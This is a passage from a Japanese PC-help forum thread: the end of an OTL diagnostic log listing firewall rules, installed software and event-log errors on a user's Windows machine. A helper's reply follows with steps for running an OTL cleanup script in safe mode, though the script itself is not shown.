"TCP Query User{BEABC980-B2CF-42ED-B4C3-4CA46E6F05C1}C:\program files (x86)\steam\steamapps\common\starbound\win32\starbound_server.exe" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\starbound\win32\starbound_server.exe |
"TCP Query User{D1ED5296-1DCC-44C5-AB27-D68D5B4F09EF}C:\users\【ユーザー名】\desktop\teamspeak3-server_win64\ts3server_win64.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\desktop\teamspeak3-server_win64\ts3server_win64.exe |
"TCP Query User{EB554B65-6A61-4FAD-A4BC-F0B939E040FA}C:\users\【ユーザー名】\appdata\roaming\dropbox\bin\dropbox.exe" = protocol=6 | dir=in | app=c:\users\【ユーザー名】\appdata\roaming\dropbox\bin\dropbox.exe |
"UDP Query User{018318F9-DF67-40B2-B424-9C661D7419FE}C:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.4\kancolleviewer.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.4\kancolleviewer.exe |
"UDP Query User{1328747C-7C9B-4134-8964-DCBB2619A560}C:\program files (x86)\java\jre7\bin\javaw.exe" = protocol=17 | dir=in | app=c:\program files (x86)\java\jre7\bin\javaw.exe |
"UDP Query User{132BCC89-D067-40C0-BC20-DD1F16B255BA}C:\program files\bitcomet\bitcomet.exe" = protocol=17 | dir=in | app=c:\program files\bitcomet\bitcomet.exe |
"UDP Query User{1A72E378-22B3-43DC-BBFF-50AF69099186}C:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.6\kancolleviewer.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.6\kancolleviewer.exe |
"UDP Query User{3065D8C4-E99B-4EBE-B6BD-DA7ACB404D49}C:\users\【ユーザー名】\desktop\艦これ\提督業も忙しい\kancolleviewer.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\提督業も忙しい\kancolleviewer.exe |
"UDP Query User{39AE53E5-AF58-4F3E-80F3-F5D726E68960}C:\riot games\league of legends\rads\projects\lol_patcher\releases\0.0.0.14\deploy\lolpatcher.exe" = protocol=17 | dir=in | app=c:\riot games\league of legends\rads\projects\lol_patcher\releases\0.0.0.14\deploy\lolpatcher.exe |
"UDP Query User{3A903891-3427-44B3-ADD0-E2CB19184471}C:\users\【ユーザー名】\desktop\艦これ\提督業も忙しい\kancolleviewer.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\提督業も忙しい\kancolleviewer.exe |
"UDP Query User{3C3C7169-9B09-4DA1-9B08-E74739785925}C:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.4\kancolleviewer.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.4\kancolleviewer.exe |
"UDP Query User{3E3BA15A-AF39-496E-A764-7BBBE4E0ECB4}C:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe" = protocol=17 | dir=in | app=c:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe |
"UDP Query User{4B1BD6FB-2C69-4084-ABB8-F86A6C8C4645}C:\program files (x86)\steam\steamapps\common\terraria\terrariaserver.exe" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\terraria\terrariaserver.exe |
"UDP Query User{5F881E0B-86C0-432D-AF37-6049BC1B0A4C}C:\users\【ユーザー名】\desktop\teamspeak3-server_win64\ts3server_win64.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\teamspeak3-server_win64\ts3server_win64.exe |
"UDP Query User{7A45263F-5FDD-4BA4-B89B-C2CD41C4E249}C:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.6\kancolleviewer.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.3.6\kancolleviewer.exe |
"UDP Query User{A80CF77E-8FA1-4F97-90B0-79875CB4CEC8}C:\users\【ユーザー名】\desktop\kancolleviewer ver.2.4\kancolleviewer.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\kancolleviewer ver.2.4\kancolleviewer.exe |
"UDP Query User{B1523796-A8CA-4381-8327-272B8E56CBB0}C:\games\world_of_warships\wowslauncher.exe" = protocol=17 | dir=in | app=c:\games\world_of_warships\wowslauncher.exe |
"UDP Query User{D2430190-5C9B-4480-97FB-66FA6EA87CA4}C:\users\【ユーザー名】\desktop\提督業も忙しい\kancolleviewer.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\提督業も忙しい\kancolleviewer.exe |
"UDP Query User{D2DA33DD-74AB-4343-94BE-C4E6FEA54BE4}C:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.2.6 beta\kancolleviewer.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\艦これ\kancolleviewer ver.2.6 beta\kancolleviewer.exe |
"UDP Query User{E1784312-92EB-4B19-9711-258E825B4166}C:\users\【ユーザー名】\appdata\roaming\dropbox\bin\dropbox.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\appdata\roaming\dropbox\bin\dropbox.exe |
"UDP Query User{E4A31AA7-7E4D-4D31-9D6F-EDC58BCA2644}C:\users\【ユーザー名】\appdata\roaming\utorrent\utorrent.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\appdata\roaming\utorrent\utorrent.exe |
"UDP Query User{EC1C77DA-0D2A-4208-A2B1-A79ED32F2898}C:\program files (x86)\steam\steamapps\common\starbound\win32\starbound_server.exe" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\starbound\win32\starbound_server.exe |
"UDP Query User{EE5691C4-FCC6-4052-BE9D-11C8DD6473BB}C:\riot games\league of legends\rads\projects\lol_patcher\releases\0.0.0.14\deploy\lolpatcherux.exe" = protocol=17 | dir=in | app=c:\riot games\league of legends\rads\projects\lol_patcher\releases\0.0.0.14\deploy\lolpatcherux.exe |
"UDP Query User{FBC62EB4-E510-4E7C-AC51-3D8E89A74B86}C:\users\【ユーザー名】\desktop\kancolleviewer ver.2.4\kancolleviewer.exe" = protocol=17 | dir=in | app=c:\users\【ユーザー名】\desktop\kancolleviewer ver.2.4\kancolleviewer.exe |

[color=#E56717]========== HKEY_LOCAL_MACHINE Uninstall List ==========[/color]

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{071c9b48-7c32-4621-a0ac-3f809523288f}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{07A13FD1-8688-4FBA-94E7-5A942B3533F2}" = DisplayLink Graphics
"{09536BA1-E498-4CC3-B834-D884A67D7E34}" = Intel® Trusted Connect Service Client
"{0B78ECB0-1A6B-4E6D-89D7-0E7CE77F0427}" = MyWinLocker
"{180C8888-50F1-426B-A9DC-AB83A1989C65}" = Windows Live Language Selector
"{1AAF6669-31B2-3840-9346-F0F653840FD1}" = Microsoft .NET Framework 4.5.1 (JPN)
"{1ACC8FFB-9D84-4C05-A4DE-D28A9BC91698}" = Windows Live ID Sign-in Assistant
"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" = Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219
"{1F557316-CFC0-41BD-AFF7-8BC49CE444D7}" = Shredder
"{23170F69-40C1-2702-0920-000001000000}" = 7-Zip 9.20 (x64 edition)
"{26784146-6E05-3FF9-9335-786C7C0FB5BE}" = Microsoft .NET Framework 4.5.2
"{37B8F9C7-03FB-3253-8781-2517C99D7C00}" = Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030
"{3BF2C0A8-2C44-4A36-AA96-3BD6FB7BB01F}" = Windows Live Remote Client Resources
"{4710662C-8204-4334-A977-B1AC9E547819}" = Broadcom Card Reader Driver Installer
"{54C5B89F-0A8C-4C07-A51D-7380974DA459}" = Windows Live Remote Service Resources
"{5D239A92-31A4-4FCA-967D-F9EA8E1FDF6A}" = iTunes
"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
"{690285C2-2481-44FB-8402-162EA970A6DD}" = Logitech Gaming Software
"{6C9365EB-1F9E-4893-9196-3EC77C88D0C5}" = インテル(R) ターボ・ブースト・テクノロジー・モニター 2.5
"{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}" = Bonjour
"{8220EEFE-38CD-377E-8595-13398D740ACE}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5.2
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1041" = Microsoft .NET Framework 4.5.1 (日本語)
"{95120000-00B9-0409-1000-0000000FF1CE}" = Microsoft Application Error Reporting
"{9B3B4129-220E-42C7-9C5B-91C65E0885B4}" = Apple Mobile Device Support
"{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{B98C4542-1B4B-4483-8265-2951DF6966CD}" = DisplayLink Core Software
"{C91DCB72-F5BB-410D-A91A-314F5D1B4284}" = Broadcom NetLink Controller
"{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" = Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030
"{D7B824DE-DA32-4772-9E5E-39C5158136A7}" = Apple Application Support(64 ビット)
"{D9FCBAAE-DB72-488B-96D0-0AA3C892C0D6}" = Microsoft Security Client
"{DA54F80E-261C-41A2-A855-549A144F2F59}" = Windows Live MIME IFilter
"{DF6D988A-EEA0-4277-AAB8-158E086E439B}" = Windows Live Remote Client
"{E02A6548-6FDE-40E2-8ED9-119D7D7E641F}" = Windows Live Remote Service
"Broadcom Wireless Utility" = Broadcom Wireless Utility
"CCleaner" = CCleaner
"Elantech" = ETDWare PS/2-X64 10.6.9.9_WHQL
"Explzh" = Explzh for Windows (64bit)
"Logitech Gaming Software" = Logicool ゲーム ソフトウェア 8.57
"Microsoft Security Client" = Microsoft Security Essentials

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{019EF473-6D0A-415C-9A2E-1AF5F66AC60F}" = Windows Live Messenger
"{0A3925EA-5B0E-401B-A189-7419149747B2}" = Adobe AIR
"{0B0F231F-CE6A-483D-AA23-77B364F75917}" = Windows Live Installer
"{0B61BBD5-DA3C-409A-8730-0C3DC3B0F270}" = Backup Manager V3
"{10AB1F40-BDEC-4A8D-B427-30F9429378B0}" = Windows Live Movie Maker
"{15D95497-8F76-41E5-8894-EDDB59E39BD9}" = Windows Live メール
"{17DF9714-60C9-43C9-A9C2-32BCAED44CBE}" = MyWinLocker Suite
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{1F6AB0E7-8CDD-4B93-8A23-AA9EB2FEFCE4}" = Junk Mail filter update
"{200FEC62-3C34-4D60-9CE8-EC372E01C08F}" = Windows Live SOXE Definitions
"{26A24AE4-039D-4CA4-87B4-2F83218060F0}" = Java 8 Update 60
"{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}" = Microsoft XNA Framework Redistributable 4.0
"{3336F667-9049-4D46-98B6-4C743EEBC5B1}" = Windows Live Photo Gallery
"{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" = Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030
"{39F15B50-A977-4CA6-B1C3-6A8724CDA025}" = MyWinLocker 4
"{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}" = Intel(R) Rapid Storage Technology
"{402ED4A1-8F5B-387A-8688-997ABF58B8F2}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729
"{40A66DF6-22D3-44B5-A7D3-83B118A2C0DC}" = Norton Online Backup
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{517E7DBD-7A5B-4B7F-B137-82AB4DAD68FC}" = LogMeIn Hamachi
"{51C7AD07-C3F6-4635-8E8A-231306D810FE}" = Cisco LEAP Module
"{59E4543A-D49D-4489-B445-473D763C79AF}" = Microsoft Games for Windows - LIVE Redistributable
"{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}" = Google Update Helper
"{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}" = Cisco EAP-FAST Module
"{65153EA5-8B6E-43B6-857B-C6E4FC25798A}" = Intel(R) Management Engine Components
"{675D8E1E-2388-4718-902C-E5FC4888AC0E}" = Windows Live Essentials
"{682B3E4F-696A-42DE-A41C-4C07EA1678B4}" = Windows Live SOXE
"{6A0549A9-1B96-498C-ACBC-3943001FEB19}" = Skype(TM) 7.8
"{6C3F8916-D6A5-4A31-9DA8-80C973CE437F}" = Windows Live Writer
"{6D1221A9-17BF-4EC0-81F2-27D30EC30701}" = Skype Click to Call
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{7134EF35-DA07-41F8-A71F-66709E194BB5}" = Windows Live Mesh
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{79BF4901-1EC4-4726-B3C2-A7859706C6E7}" = League of Legends
"{7F811A54-5A09-4579-90E1-C93498E230D9}" = Acer eRecovery Management
"{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
"{83C292B7-38A5-440B-A731-07070E81A64F}" = Windows Live PIMT Platform
"{88A686A9-D687-4295-B633-50D8A4B88371}" = Windows Live Writer Resources
"{8A66A2C8-0032-4949-8D99-C293A3EACF79}" = Windows Live Photo Common
"{8C6D6116-B724-4810-8F2D-D047E6B7D68E}" = Mesh Runtime
"{8D59BE38-3A4F-4525-AD0D-8980E9E31EFA}" = Windows Live フォト ギャラリー
"{8DD46C6A-0056-4FEC-B70A-28BB16A1F11F}" = MSVCRT
"{912422D4-0A22-4F70-BF8D-802B4BCD0999}" = Chrome Remote Desktop Host
"{92EA4134-10D1-418A-91E1-5A0453131A38}" = Windows Live Movie Maker
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{9D56775A-93F3-44A3-8092-840E3826DE30}" = Windows Live Mail
"{A726AE06-AAA3-43D1-87E3-70F510314F04}" = Windows Live Writer
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{A9BDCA6B-3653-467B-AC83-94367DA3BFE3}" = Windows Live Photo Common
"{AAAFC670-569B-4A2F-82B4-42945E0DE3EF}" = Windows Live Writer
"{AC76BA86-0804-1033-1959-001824147215}" = Adobe Refresh Manager
"{AC76BA86-7AD7-FFFF-7B44-AA0000000001}" = Adobe Reader X (10.1.15) MUI
"{AFA1153A-F547-409B-B837-3A0D6C5A3FEC}" = Apple Application Support(32 ビット)
"{B175520C-86A2-35A7-8619-86DC379688B9}" = Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030
"{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}" = Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030
"{C2695E83-CF1D-43D1-84FE-B3BEC561012A}" = Shredder
"{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" = Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030
"{CE95A79E-E4FC-4FFF-8A75-29F04B942FF2}" = Windows Live UX Platform
"{D0B44725-3666-492D-BEF6-587A14BD9BD9}" = MSVCRT_amd64
"{D3D5C4E8-040F-4C6F-8105-41D43CF94F44}" = NTI Media Maker 9
"{D45240D3-B6B3-4FF9-B243-54ECE3E10066}" = Windows Live Communications Platform
"{DDA3C325-47B2-4730-9672-BF3771C08799}_is1" = XMedia Recode バージョン 3.1.9.0
"{DECDCB7C-58CC-4865-91AF-627F9798FE48}" = Windows Live Mesh
"{E09C4DB7-630C-4F06-A631-8EA7239923AF}" = D3DX10
"{E3739848-5329-48E3-8D28-5BBD6E8BE384}" = CyberLink MediaEspresso
"{E5B21F11-6933-4E0B-A25C-7963E3C07D11}" = Windows Live Messenger
"{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}" = Cisco PEAP Module
"{EE408577-9C0E-4E5F-BCB2-DB5B3A220958}" = Windows Live UX Platform Language Pack
"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219
"{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}" = Intel(R) Processor Graphics
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{F8A9085D-4C7A-41a9-8A77-C8998A96C421}" = Intel(R) Control Center
"{FCB3772C-B7D0-4933-B1A9-3707EBACC573}" = Intel(R) OpenCL CPU Runtime
"{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022
"Acer Registration" = Acer Registration
"Acer Screensaver" = Acer ScreenSaver
"Acer Welcome Center" = Welcome Center
"Adobe AIR" = Adobe AIR
"Adobe Flash Player ActiveX" = Adobe Flash Player 18 ActiveX
"Adobe Flash Player NPAPI" = Adobe Flash Player 18 NPAPI
"Battlelog Web Plugins" = Battlelog Web Plugins
"Google Chrome" = Google Chrome
"Identity Card" = Identity Card
"InstallShield_{0B61BBD5-DA3C-409A-8730-0C3DC3B0F270}" = Acer Backup Manager
"InstallShield_{17DF9714-60C9-43C9-A9C2-32BCAED44CBE}" = MyWinLocker Suite
"InstallShield_{D3D5C4E8-040F-4C6F-8105-41D43CF94F44}" = NTI Media Maker 9
"InstallShield_{E3739848-5329-48E3-8D28-5BBD6E8BE384}" = CyberLink MediaEspresso
"Jane Style_is1" = Jane Style Version 3.83
"Janetter2_is1" = Janetter 4.3.0.2
"League of Legends 3.0.1" = League of Legends
"LManager" = Launch Manager
"LogMeIn Hamachi" = LogMeIn Hamachi
"Mozilla Firefox 37.0.1 (x86 ja)" = Mozilla Firefox 37.0.1 (x86 ja)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"Origin" = Origin
"PunkBusterSvc" = PunkBuster Services
"RED BELT SKIN Series" = RED BELT SKIN Series
"Steam" = Steam
"Steam App 105600" = Terraria
"Steam App 207610" = The Walking Dead
"Steam App 211820" = Starbound
"Steam App 22370" = Fallout 3 - Game of the Year Edition
"Steam App 261030" = The Walking Dead: Season Two
"Steam App 332310" = LEGO® Worlds
"Steam App 367540" = Starbound - Unstable
"Steam App 49520" = Borderlands 2
"Steam App 550" = Left 4 Dead 2
"Steam App 620" = Portal 2
"VLC media player" = VLC media player
"WinLiveSuite" = Windows Live Essentials
"らくらく無線スタートEX" = らくらく無線スタートEX

[color=#E56717]========== HKEY_USERS Uninstall List ==========[/color]

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]

[color=#E56717]========== HKEY_USERS Uninstall List ==========[/color]

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]

[color=#E56717]========== HKEY_USERS Uninstall List ==========[/color]

[HKEY_USERS\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{1EAC1D02-C6AC-4FA6-9A44-96258C37C814na}_is1" = World of Warships
"Dropbox" = Dropbox
"Hangame.com" = Hangame
"OneDriveSetup.exe" = Microsoft OneDrive
"TeamSpeak 3 Client" = TeamSpeak 3 Client
"UnityWebPlayer" = Unity Web Player
"Vivaldi" = Vivaldi

[color=#E56717]========== Last 20 Event Log Errors ==========[/color]

[ Application Events ]
Error - 2015/06/21 22:59:11 | Computer Name = 【ユーザー名】 | Source = Application Error | ID = 1000
Description = 障害が発生しているアプリケーション名: Fallout3.exe、バージョン: 1.7.0.3、タイム スタンプ: 0x4a40f18b
障害が発生しているモジュール名:
Fallout3.exe、バージョン: 1.7.0.3、タイム スタンプ: 0x4a40f18b 例外コード: 0xc0000005 障害オフセット: 0x006ddf7b
障害が発生しているプロセス
ID: 0x1e50 障害が発生しているアプリケーションの開始時刻: 0x01d0ac96fef87d55 障害が発生しているアプリケーション パス: C:\Program
Files (x86)\Steam\steamapps\common\Fallout 3 goty\Fallout3.exe 障害が発生しているモジュール パス:
C:\Program Files (x86)\Steam\steamapps\common\Fallout 3 goty\Fallout3.exe レポート ID:
a7c2b4a2-188a-11e5-9a33-208984cf2c64

Error - 2015/06/21 23:12:59 | Computer Name = 【ユーザー名】 | Source = Application Error | ID = 1000
Description = 障害が発生しているアプリケーション名: Fallout3.exe、バージョン: 1.7.0.3、タイム スタンプ: 0x4a40f18b
障害が発生しているモジュール名:
Fallout3.exe、バージョン: 1.7.0.3、タイム スタンプ: 0x4a40f18b 例外コード: 0xc0000005 障害オフセット: 0x006ddf7b
障害が発生しているプロセス
ID: 0x2050 障害が発生しているアプリケーションの開始時刻: 0x01d0ac99411def0b 障害が発生しているアプリケーション パス: C:\Program
Files (x86)\Steam\steamapps\common\Fallout 3 goty\Fallout3.exe 障害が発生しているモジュール パス:
C:\Program Files (x86)\Steam\steamapps\common\Fallout 3 goty\Fallout3.exe レポート ID:
957a364e-188c-11e5-9a33-208984cf2c64

Error - 2015/06/21 23:25:11 | Computer Name = 【ユーザー名】 | Source = Application Error | ID = 1000
Description = 障害が発生しているアプリケーション名: igfxext.exe、バージョン: 8.15.10.2712、タイム スタンプ: 0x4f710c3a
障害が発生しているモジュール名:
ntdll.dll、バージョン: 6.1.7601.18869、タイム スタンプ: 0x556366f2 例外コード: 0xc0000374 障害オフセット: 0x00000000000bfc22
障害が発生しているプロセス
ID: 0xdb4 障害が発生しているアプリケーションの開始時刻: 0x01d0ac9b0888cab8 障害が発生しているアプリケーション パス: C:\Windows\system32\igfxext.exe
障害が発生しているモジュール
パス: C:\Windows\SYSTEM32\ntdll.dll レポート ID: 496ea743-188e-11e5-b916-208984cf2c64

Error - 2015/06/21 23:25:13 | Computer Name = 【ユーザー名】 | Source = WinMgmt | ID = 10
Description =

Error - 2015/06/21 23:27:14 | Computer Name = 【ユーザー名】 | Source = McLogEvent | ID = 5022
Description = MCSCAN32 Engine Initialisation failed. Engine returned error : 1

Error - 2015/06/21 23:37:40 | Computer Name = 【ユーザー名】 | Source = Application Error | ID = 1000
Description = 障害が発生しているアプリケーション名: Fallout3.exe、バージョン: 1.7.0.3、タイム スタンプ: 0x4a40f18b
障害が発生しているモジュール名:
Fallout3.exe、バージョン: 1.7.0.3、タイム スタンプ: 0x4a40f18b 例外コード: 0xc0000005 障害オフセット: 0x006ddf7b
障害が発生しているプロセス
ID: 0xaf4 障害が発生しているアプリケーションの開始時刻: 0x01d0ac9c9d89d1b3 障害が発生しているアプリケーション パス: C:\Program
Files (x86)\Steam\steamapps\common\Fallout 3 goty\Fallout3.exe 障害が発生しているモジュール パス:
C:\Program Files (x86)\Steam\steamapps\common\Fallout 3 goty\Fallout3.exe レポート ID:
07db9bb4-1890-11e5-b916-208984cf2c64

Error - 2015/06/21 23:43:54 | Computer Name = 【ユーザー名】 | Source = Application Error | ID = 1000
Description = 障害が発生しているアプリケーション名: Fallout3.exe、バージョン: 1.7.0.3、タイム スタンプ: 0x4a40f18b
障害が発生しているモジュール名:
Fallout3.exe、バージョン: 1.7.0.3、タイム スタンプ: 0x4a40f18b 例外コード: 0xc0000005 障害オフセット: 0x006ddf7b
障害が発生しているプロセス
ID: 0x1b50 障害が発生しているアプリケーションの開始時刻: 0x01d0ac9d9da3ac46 障害が発生しているアプリケーション パス: C:\Program
Files (x86)\Steam\steamapps\common\Fallout 3 goty\Fallout3.exe 障害が発生しているモジュール パス:
C:\Program Files (x86)\Steam\steamapps\common\Fallout 3 goty\Fallout3.exe レポート ID:
e726ff80-1890-11e5-b916-208984cf2c64

Error - 2015/06/22 9:04:52 | Computer Name = 【ユーザー名】 | Source = Application Hang | ID = 1002
Description = プログラム starbound_opengl.exe バージョン 0.9.0.0 は Windows との対話を停止し、終了しました。問題に関する詳細な情報があるかどうかを確認するには、アクション
センター コントロール パネルで、問題の履歴をクリックしてください。 プロセス ID: 1fd4 開始時刻: 01d0acebc2eca02b 終了時刻: 7 アプリケーション
パス: C:\Program Files (x86)\Steam\steamapps\common\Starbound - Unstable\win64\starbound_opengl.exe

レポート
ID: 23d6489c-18df-11e5-b916-208984cf2c64

Error - 2015/06/22 9:05:26 | Computer Name = 【ユーザー名】 | Source = Application Hang | ID = 1002
Description = プログラム starbound_opengl.exe バージョン 0.9.0.0 は Windows との対話を停止し、終了しました。問題に関する詳細な情報があるかどうかを確認するには、アクション
センター コントロール パネルで、問題の履歴をクリックしてください。 プロセス ID: 2160 開始時刻: 01d0acebbf329773 終了時刻: 33 アプリケーション
パス: C:\Program Files (x86)\Steam\steamapps\common\Starbound - Unstable\win64\starbound_opengl.exe

レポート
ID: 57c347c0-18df-11e5-b916-208984cf2c64

Error - 2015/06/22 10:28:30 | Computer Name = 【ユーザー名】 | Source = Application Hang | ID = 1002
Description = プログラム Janetter.exe バージョン 4.2.3.0 は Windows との対話を停止し、終了しました。問題に関する詳細な情報があるかどうかを確認するには、アクション
センター コントロール パネルで、問題の履歴をクリックしてください。 プロセス ID: ebc 開始時刻: 01d0ac9e17f431a4 終了時刻: 76 アプリケーション
パス: C:\Program Files (x86)\Janetter2\bin\Janetter.exe レポート ID: f1112d56-18ea-11e5-b916-208984cf2c64


[ Broadcom Wireless LAN Events ]
Error - 2014/11/23 0:12:08 | Computer Name = 【ユーザー名】 | Source = WLAN-Tray | ID = 0
Description = 13:12:03, Sun, Nov 23, 14 Error - Unable to gain access to user store


Error - 2014/12/03 3:42:45 | Computer Name = 【ユーザー名】 | Source = WLAN-Tray | ID = 0
Description = 16:42:39, Wed, Dec 03, 14 Error - Unable to gain access to user store


Error - 2014/12/03 18:42:24 | Computer Name = 【ユーザー名】 | Source = WLAN-Tray | ID = 0
Description = 07:42:19, Thu, Dec 04, 14 Error - Unable to gain access to user store


Error - 2015/01/23 14:19:36 | Computer Name = 【ユーザー名】 | Source = WLAN-Tray | ID = 0
Description = 03:19:34, Sat, Jan 24, 15 Error - Unable to gain access to user store


Error - 2015/01/28 17:49:46 | Computer Name = 【ユーザー名】 | Source = WLAN-Tray | ID = 0
Description = 06:49:44, Thu, Jan 29, 15 Error - Unable to gain access to user store


Error - 2015/02/11 9:25:29 | Computer Name = 【ユーザー名】 | Source = WLAN-Tray | ID = 0
Description = 22:25:27, Wed, Feb 11, 15 Error - Unable to gain access to user store


Error - 2015/02/22 7:50:39 | Computer Name = 【ユーザー名】 | Source = WLAN-Tray | ID = 0
Description = 20:50:36, Sun, Feb 22, 15 Error - Unable to gain access to user store


Error - 2015/04/14 10:47:34 | Computer Name = 【ユーザー名】 | Source = WLAN-Tray | ID = 0
Description = 23:47:33, Tue, Apr 14, 15 Error - Unable to gain access to user store


[ System Events ]
Error - 2015/09/11 2:30:49 | Computer Name = 【ユーザー名】 | Source = Service Control Manager | ID = 7000
Description = TrustedInstaller サービスを、次のエラーが原因で開始できませんでした: %%2

Error - 2015/09/11 7:31:07 | Computer Name = 【ユーザー名】 | Source = Service Control Manager | ID = 7000
Description = TrustedInstaller サービスを、次のエラーが原因で開始できませんでした: %%2

Error - 2015/09/11 12:31:27 | Computer Name = 【ユーザー名】 | Source = Service Control Manager | ID = 7000
Description = TrustedInstaller サービスを、次のエラーが原因で開始できませんでした: %%2

Error - 2015/09/11 14:20:31 | Computer Name = 【ユーザー名】 | Source = Service Control Manager | ID = 7000
Description = TrustedInstaller サービスを、次のエラーが原因で開始できませんでした: %%2

Error - 2015/09/11 14:20:57 | Computer Name = 【ユーザー名】 | Source = Service Control Manager | ID = 7000
Description = TrustedInstaller サービスを、次のエラーが原因で開始できませんでした: %%2

Error - 2015/09/11 17:31:45 | Computer Name = 【ユーザー名】 | Source = Service Control Manager | ID = 7000
Description = TrustedInstaller サービスを、次のエラーが原因で開始できませんでした: %%2

Error - 2015/09/11 22:32:02 | Computer Name = 【ユーザー名】 | Source = DCOM | ID = 10005
Description =

Error - 2015/09/11 22:32:02 | Computer Name = 【ユーザー名】 | Source = Service Control Manager | ID = 7000
Description = TrustedInstaller サービスを、次のエラーが原因で開始できませんでした: %%2

Error - 2015/09/12 3:32:20 | Computer Name = 【ユーザー名】 | Source = Service Control Manager | ID = 7000
Description = TrustedInstaller サービスを、次のエラーが原因で開始できませんでした: %%2

Error - 2015/09/12 4:20:03 | Computer Name = 【ユーザー名】 | Source = bowser | ID = 8003
Description =


< End of report >
  • あすとろ
  • 2015/09/15 (Tue) 20:56:11
返信フォームへ 
ユーザー名編集してからOTLで処置を
早速のレスありがとうございます。
Extraのログも見せていただきました。
ではOTLで見えた物を今度はOTL上から掃除にかかりましょう。

このレスの最後にスクリプトを貼っておくので、それを丸ごとコピーして、それをWindowsのメモ帳ファイルに貼り付けて保存しておいてください。
ただし、【ユーザー名】の箇所は本来のユーザー名に書き換えておいてください。

用意できたらPCをまたセーフモードで再起動してOTL起動してください。
起動したらOTLのウインドウ下部にスクリプトを貼り付けて、今度は「Run fix」(赤字のボタン)を押してください。
これでOTLでの処置が開始されます。

